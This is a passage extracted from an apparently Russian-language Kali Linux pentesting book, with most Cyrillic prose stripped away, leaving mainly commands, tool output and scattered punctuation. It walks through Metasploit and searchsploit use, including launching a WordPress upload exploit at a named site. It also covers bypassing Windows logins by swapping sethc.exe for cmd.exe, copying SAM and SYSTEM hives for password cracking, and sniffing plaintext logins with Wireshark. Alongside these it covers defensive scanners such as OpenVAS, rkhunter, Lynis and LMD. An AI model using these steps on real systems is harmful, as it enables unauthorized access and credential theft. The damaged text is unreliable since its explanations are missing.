Pykto nikto, python.
nikto (scan_database) .
Hmap -, ,
.
"Server".
hmap Dustin`a Lee.
Console .
Html_file HTML-.
:
1 w3af/plugins>>> back
2 w3af>>> start
, .
:
w3af>>> start
1 Auto-enabling plugin: discovery.allowedMethods
2 Auto-enabling plugin: discovery.error404page
3 Auto-enabling plugin: discovery.serverHeader
4 The Server header for this HTTP server is: Apache/2.2.3 (Ubuntu) PHP/5.2.1
5 Hmap plugin is starting. Fingerprinting may take a while.
6 The most accurate fingerprint for this HTTP server is: Apache/2.0.55 (Ubuntu) PHP/5.1.2
7 pykto plugin is using "Apache/2.0.55 (Ubuntu) PHP/5.1.2" as the remote server type. This informa
8 pykto plugin found a vulnerability at URL: http://localhost/icons/ . Vulnerability description: Dire
9 the /icons directory should be removed. The vulnerability was found in the request with id 128.
10 pykto plugin found a vulnerability at URL: http://localhost/doc/ . Vulnerability description: The /d
11 pykto plugin found a vulnerability at URL: http://localhost/\> . Vulnerability description: The IBM
12was found in the request with id 3385.
13 New URL found by discovery: http://localhost/
14 New URL found by discovery: http://localhost/test2.html
15 New URL found by discovery: http://localhost/xst2.html
16 New URL found by discovery: http://localhost/xst.html
New URL found by discovery: http://localhost/test.html
, results.html:
145

Metasploit Framework Kali Linux

(Network Services Policy) Kali Linux,


, ,
Metasploit .
Kali PostgreSQL
Metasploit PostgreSQL ,
.
1 service postgresql start
, PostgreSQL ss -ant ,
5432 .
1 State Recv-Q<span id="more-1784"></span> Send-Q Local Address:Port Peer Address:Port
2 LISTEN 0 128 :::22 :::*
3 LISTEN 0 128 *:22 *:*
4 LISTEN 0 128 127.0.0.1:5432 *:*
5 LISTEN 0 128 ::1:5432 :::*
Kali Metasploit
PostgreSQL, , , metasploit.
, , msf3 user
msf3. Metasploit RPC -, .
1 service metasploit start
msfconsole Kali
, PostgreSQL Metasploit , msfconsole
db_status .
1 msfconsole
2 msf > db_status
3 [*] postgresql connected to msf3
4 msf >
Metasploit
PostgreSQL Metasploit ,
update-rc.d .
1 update-rc.d postgresql enable
2 update-rc.d metasploit enable
146

Metasploit Exploitation Framework searchsploit


Metasploit Exploitation Framework .


, Metasploit.
Metasploit, .
searchsploit . ,
, , Metasploit.
.
, . ,
, ,
,
.
, , .
Kali Linux . , , :
Metasploit Framework Kali Linux
Kali Linux:

Kali Linux, ,
Linux.
searchsploit
. ,
:
1 searchsploit -h

5 :
-c .
-v , .
, .
searchsploit ( ), :
147

1 searchsploit phpmyadmin

1 searchsploit wordpress
148

, . ( ),
, . .
: : .c, .pl, .txt, .sh,
.php, .rb, .py, .zip, .java, .asm, .htm .
.txt
. , , : ,
, , . .
149

.rb Ruby, :
ruby + + .
:
1 ruby /usr/share/exploitdb/platforms/php/webapps/28126.rb
150

.rb Metasploit.
-,
1 require 'msf/core'
Metasploit

.c .
.php . Ruby
, PHP
( ,
).
,
1 php /usr/share/exploitdb/platforms/php/webapps/35413.php webware.biz Alexey 50
151

.pl Perl, , , perl.


( ) PHP.
, .
. Metasploit.
Metasploit
Metasploit .
10 . Metasploit Framework.
- , :
152

- ,
. :
1 msf > db_rebuild_cache
search + + . :
1 msf > search wordpress
153

, , .
: ,
, ( ),
.
, WordPress , . .
.
, , :
exploit/unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent WordPress Download
Manager (download-manager) Unauthenticated File Upload
exploit/unix/webapp/wp_downloadmanager_upload
use .
1 msf > use exploit/unix/webapp/wp_downloadmanager_upload
, :


1 show options
( ).
154

, .
set
:
1 set RHOST webware.biz

.
TARGETURI. , , phpMyAdmin,
phpmyadmin ,
.

1 exploit

, .
, , ,
, . . nmap.
:
1 msf > nmap 10.0.2.2
155

1 msf > nmap webware.biz


156

, , , ,
.
" Kali Linux 1.0.9a. 2.
".

, :
- (phpMyAdmin, WordPress, Drupal . .)
.
. , -.
, .
- , : )
, , ; )
, ,
.
157

6.

OpenVAS 8.0

.

.
Kali Linux OpenVAS 8.0
Kali Linux.
, ,
OpenVAS 8.0 .
Kali
, , Kali
OpenVAS. , openvas-setup OpenVAS,
, admin .
,
.
1 root@kali:~# apt-get update
2 root@kali:~# apt-get dist-upgrade
3
4 root@kali:~# apt-get install openvas
5 root@kali:~# openvas-setup
6 /var/lib/openvas/private/CA created
7 /var/lib/openvas/CA created
8
9 [i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.
10 [i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed
11 ...
12 sent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec
13 total size is 681654050 speedup is 1.00
14 [i] Initializing scap database
15 [i] Updating CPEs
16 [i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml
17 [i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml
18 ...
158

19 Write out database with 1 new entries


20 Data Base Updated
21 Restarting Greenbone Security Assistant: gsad.
22 User created with password '6062d074-0a4c-4de1-a26a-5f9f055b7c88'.
, . - ,
. - ,
, .
.
openvas-setup , OpenVAS manager, GSAD
:
1 root@kali:~# netstat -antp
2 Active Internet connections (servers and established)
3 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
4 tcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9390/openvasmd
5 tcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9391/openvassd: Wai
6 tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 9392/gsad

- OpenVAS
159

https://127.0.0.1:9392,
SSL admin.
. (
, ),
. :
1 openvasmd --get-users
:
1 openvasmd --user=admin --new-password=1
, admin, , ,
. , , .

1 openvasmd --create-user=mial
.


1 openvas-start
160

! OpenVAS IP ,
. !

Linux (rootkits) rkhunter

(rootkit) ,
, .
, ,
, , -
.
Linux ,
.
Rootkit Hunter (rkhunter). , Linux
rkhunter.
rkhunter Linux
rkhunter Debian, Ubuntu Linux Mint:
1 $ sudo apt-get install rkhunter
rkhunter Fedora:
1 $ sudo yum install rkhunter
rkhunter CentOS RHEL Repoforge
, yum.
1 $ sudo yum install rkhunter
Linux
.
1 $ sudo rkhunter -c
rkhunter , , :
SHA-1
, .
, .
, , -
.
,
xinetd.
.
.
.
.
.
Rootkit Hunter .
161

, rkhunter /var/log/rkhunter.log.
.
1 $ sudo grep Warning /var/log/rkhunter.log
162

[21:33:23] Checking /dev for suspicious file types [ Warning ]


1
[21:33:23] Warning: Suspicious file types found in /dev:
2
[21:33:23] Checking for hidden files and directories [ Warning ]
3
[21:33:23] Warning: Hidden directory found: '/etc/.java: directory '
4
[21:33:23] Warning: Hidden directory found: '/dev/.udev: directory '
5
[21:33:23] Warning: Hidden file found: /dev/.initramfs: symbolic link to
6
`/run/initramfs'
Rootkit Hunter .
, , rkhunter "update".
, wget.
1 $ sudo rkhunter --update
rkhunter cronjob "cronjob", rkhunter

/var/log/rkhunter.log .
, rkhunter ,
. , rkhunter
- ? -, ,
. , ,

. , ,
rkhunter .
,
, ,
,
.
, , ,
,
. , -
, , .

Linux

Linux 6 ? .
Shellshock, Heartbleed, Poodle, Ghost , , . -
Linux,
. ? openVPN ?
SSH ? Linux.
, , ,
. Lynis. Lynis
.
, .
Lynis.
Linux?
Lynis
.
.
. Lynis
,
. ,
.
Lynis:
163

1.
2.
3.

Lynis (, yum apt-get),
, Lynis.
.
Lynis
, Lynis
.
. , ,
, .
Lynis,
.
Red Hat: $ sudo yum install lynis
Debian: $ sudo apt-get install lynis
, , . !
?
Lynis
, .
( /usr/local/lynis)
Lynis ( ).
1 mial@mial-VirtualBox ~ $ sudo -s
2 [sudo] password for mial:
3 mial-VirtualBox ~ # mkdir /usr/local/lynis
4 mial-VirtualBox ~ # cd /usr/local/lynis/
5 mial-VirtualBox lynis #

Lynis
() Lynis ( lynis-
1.6.4.tar.gz). wget ( ).
Mac OS curl, BSD
fetch.
1 mial-VirtualBox lynis # wget https://cisofy.com/files/lynis-1.6.4.tar.gz
164

2 --2015-02-15 12:55:25-- https://cisofy.com/files/lynis-1.6.4.tar.gz


3 cisofy.com (cisofy.com) 149.210.134.182
4 cisofy.com (cisofy.com)|149.210.134.182|:443... .
5 HTTP- . ... 200 OK
6 : 171953 (168K) [application/octet-stream]
7 : lynis-1.6.4.tar.gz
8
9 100%[======================================&amp;gt;] 171,953 168KB/s 1.0s
10
11 2015-02-15 12:55:29 (168 KB/s) - lynis-1.6.4.tar.gz [171953/171953]
12
13 mial-VirtualBox lynis # sha256sum lynis-1.6.4.tar.gz
14 886c74b591706f896149fe74adb481b58c549d32243d0cf620b46dfdd25dc66d lynis-1.6.4.tar.gz
15 mial-VirtualBox lynis #
, , .
SHA1, SHA256 .
, sha1, sha1sum, sha256sum
openssl.

1 mial-VirtualBox lynis # sha1sum lynis-1.6.4.tar.gz


2 mial-VirtualBox lynis # sha1 lynis-1.6.4.tar.gz
3 mial-VirtualBox lynis # openssl sha1 lynis-1.6.4.tar.gz
, -.
, , ,
.

lynis
1 mial-VirtualBox lynis # tar zxvf lynis-1.6.4.tar.gz
2 mial-VirtualBox lynis # cd lynis/
165

Lynis
Lynis ,
.
1 mial-VirtualBox lynis # ./lynis --help
2
3 [ Lynis 1.6.4 ]
4
5 ###############################################################################
6 Lynis comes with ABSOLUTELY NO WARRANTY. This is free software, and you are
7 welcome to redistribute it under the terms of the GNU General Public License.
8 See the LICENSE file for details about using this software.
9
10 Copyright 2007-2014 - CISOfy &amp; Michael Boelen, http://cisofy.com
11 Enterprise support and plugins available via CISOfy - http://cisofy.com
12 ###############################################################################
13
14 [+] Initializing program
15 ------------------------------------
16 Scan options:
17 --auditor "&lt;name&gt;" : Auditor name
18 --check-all (-c) : Check system
19 --no-log : Don't create a log file
20 --pentest : Non-privileged scan (useful for pentest)
21 --profile &lt;profile&gt; : Scan the system with the given profile file
22 --quick (-Q) : Quick mode, don't wait for user input
23 --tests "&lt;tests&gt;" : Run only tests defined by &lt;tests&gt;
24 --tests-category "&lt;category&gt;" : Run only tests defined by &lt;category&gt;
25
26 Layout options:
27 --no-colors : Don't use colors in output
28 --quiet (-q) : No output, except warnings
29 --reverse-colors : Optimize color display for light backgrounds
30
31 Misc options:
32 --check-update : Check for updates
33 --debug : Debug logging to screen
34 --view-manpage (--man) : View man page
35 --version (-V) : Display version number and quit
36
37 Enterprise options:
38 --plugin-dir "&lt;path&gt;" : Define path of available plugins
39 --upload : Upload data to central node
40
41 See man page and documentation for all available options.
Lynis
Linux Mint Lynis.
1 ./lynis --auditor "MiAl" -c -Q
166

- PHP:
[+] Software: PHP

Checking PHP [ NOT FOUND ]
Checking PHP disabled functions [ NONE ]
include/tests_php php.ini.
:
1 mial-VirtualBox lynis # ./lynis -c
2 ()
3 mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q
4 ()
5 mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q -q
6 ()
7 mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -q -Q --pentest
8 ( )
Lynis
Lynis /var/log/lynis.log. Lynis
Shellshock . , ,
.
- . .
Lynis .
/var/log/lynis.log .

, Lynis ( ):
, Lynis .
.
GPLv3 .
.
167

, .
-
.

, :
HTML ( ).
.
CVE HTML .
.
SQLi .
/.
, config/include .

, ,
. , Lynis .
, Linux, Windows Unix .
,
. Lynis ,
, ( )
.
.
: Lynis
: http://cisofy.com/lynis/
:
: GPLv3
http://cisofy.com/downloads/
, , ,
, .

Linux Malware Detect (LMD) Linux

, , Linux, ,
RHEL, CentOS, Fedora, Debian, Ubuntu, Mint.
, Apache
DOS , mod_security mod_evasive.
LMD (Linux Malware Detect).
Malware?
Malware () , ,

. (malware)
, , , ,
,
.
Linux Malware Detect (LMD)?
Linux Malware Detect (LMD) ,
Unix/Linux ,
GNU GPLv2. ,
. , , ,
, , ,
// .
168

Linux Malware Detect.


http://www.rfxn.com/projects/linux-malware-detect/.
Linux Malware Detect (LMD) RHEL, CentOS, Fedora, Debian, Ubuntu, Mint.
1: Linux Malware Detect (LMD)
LMD, wget.
1 cd /tmp
2 wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
2: LMD
LMD ,
.
1 tar xfz maldetect-current.tar.gz
2 cd maldetect-*
3 ./install.sh
, Debian, Ubuntu, Mint ( , sudo)

1 ./install.sh

1 sudo ./install.sh
, -.
:

3: LMD
,
, , . ,
- , .
email_alert : , 1.
email_subj : .
email_addr :
.
169

quar_hits : , 1.
quar_clean : , 1.
quar_susp : ,
, .
quar_susp_minuid : userid .
/usr/local/maldetect/conf.maldet .
1 vi /usr/local/maldetect/conf.maldet

.
1 # [ EMAIL ALERTS ]
2 ##
3 # The default email alert toggle
4 # [0 = disabled, 1 = enabled]
5 email_alert=1
6
7 # The subject line for email alerts
8 email_subj=" $(hostname)"
9
10 # The destination addresses for email alerts
11 # [ values are comma (,) spaced ]
12 email_addr="alexey@webware.biz"
13
14 # Ignore e-mail alerts for reports in which all hits have been cleaned.
15 # This is ideal on very busy servers where cleaned hits can drown out
16 # other more actionable reports.
17 email_ignore_clean=0
18
19 ##
20 # [ QUARANTINE OPTIONS ]
21 ##
22 # The default quarantine action for malware hits
23 # [0 = alert only, 1 = move to quarantine &amp; alert]
24 quar_hits=1
25
26 # Try to clean string based malware injections
27 # [NOTE: quar_hits=1 required]
28 # [0 = disabled, 1 = clean]
29 quar_clean=1
30
31 # The default suspend action for users wih hits
32 # Cpanel suspend or set shell /bin/false on non-Cpanel
33 # [NOTE: quar_hits=1 required]
34 # [0 = disabled, 1 = suspend account]
35 quar_susp=0
36 # minimum userid that can be suspended
37 quar_susp_minuid=500
4:
,
.
1 maldet --scan-all /home
170

, ,
, ,
.
1 # maldet --quarantine SCANID
2
3 # maldet --clean SCANID
5:
LMD /etc/cron.daily/maldet,
, , . .

. ,
.
1 vi /etc/cron.daily/maldet
, ,
.

Windows?

Windows ( ),
, , .

Windows
.
ElcomSoft System Recovery,
( ,
, ,
- 1, 1111, 123, admin, password, ).
Kali Linux.
, Kali Linux 1) Windows, 2)
,
.
, . 99.99%
, - .
, Live- ( Linux
). C:\Windows\System32\ cmd.exe sethc.exe
osk.exe. , sethc.exe ( osk.exe), cmd.exe
.
sethc.exe, Windows,
, SHIFT, osk.exe,
. (cmd.exe)
:
net user _ *
.. admin, :
net user admin *
.
.

Windows Kali Linux


: Windows ?
Windows SAM (System Account Management) (
). , Active Directoryis.
171

Active Directoryis ,
LDAP. SAM
C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\).
SAM , LM NTLM,
.
: .
,
SAM Windows . SAM
( ),
- . SAM
C:\. Linux, Kali,
Live-.
SAM C:\<systemroot>\repair.
SAM .
, , , ,
. expand. Expand
[FILE] [DESTINATION]. SAM
uncompressedSAM.
C:\> expand SAM uncompressedSAM
, Microsoft Windows 2000
SYSKEY. SYSKEY
SAM 128- ,
Windows.
Windows SYSKEY (
) :
1. (, Kali).
2. SAM SYSTEM
(C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\)).
3. SYSTEM bkreg bkhive.
4. .
5. , John the Ripper.
. Windows
MAC(, ), .
,
( ) .
Windows
Windows- SAM SYSKEY.
Windows ,
, Microsoft Windows
.
fdisk -l .
Windows . fdisk NTFS ,
:
Device Boot Start End Blocks Id System
/dev/hdb1* 1 2432 19535008+ 86 NTFS
/dev/hdb2 2433 2554 979965 82 Linux swap/Solaris
/dev/hdb3 2555 6202 29302560 83 Linux
mkdir /mnt/windows.
Windows
:
mount -t <WindowsType> <Windows partition> /mnt/windows
172

, Windows , SAM
SYSTEM :
cp SAM SYSTEM /pentest/passwords/AttackDirectory
SAM. PwDumpand Cain, Abel samdump
.
, SAM.
SAM. ,
SAM .
bkreg bkhiveare ,
, :

Windows:
-, .
-. ,
. ( BIOS
,
).
,
VeraCrypt TrueCrypt (
, ).
Windows ,
, , (
) . . .
173

7. .

- WireShark ( )

, , -
ENTER, . , .
-?? (, ) -
HTTP (PlainText),
( ) . ,
- -, HTTP
. ,
(BGP ,
).
, , ,
HTTP. ,
, , ,

.
, -.
. VirtualBox/VMWare/ .
: ,
.
1. Wireshark
Kali Linux Wireshark
> Kali Linux > Top 10 Security Tools > Wireshark
Wireshark Capture > Interface
, , eth0,
wlan0.
174

, Start Wireshark .
, Capture > Start

2. POST
, Wireshark .
-, .
, Wireshark. ,
. , ,
,
.
Wireshark . ,
POST.
POST?
,
POST.
POST,
:
175

1 http.request.method == "POST"
. 1 POST.

3: POST
Follow TCP Steam

, - :
176

log=Dimon&pwd=justfortest?
..
log=Dimon ( : Dimon)
pwd=justfortest (: justfortest)
, WebWare.biz .
WireShark
1. . ,
Wi-Fi , .
2. , , ,
. ( ),
, , .
, .
.
, ,
, .
3. VPN,
.
177

4. SSL-. :
. : , , ,
- SSL-, , .
: ( , , , -
, - . .) . !
, SSL-.
( , /
/ ), SSL-
( , ). ,
, , 400 .
, SSL-.
- ,
SSL-, .
, , .
178

( WebWare.biz),
- ,
: http://webware.biz/?page_id=27

http://webware.biz/


http://webware.biz/?feed=rss2 https://vk.com/webware_biz

http://webware.biz/?p=3920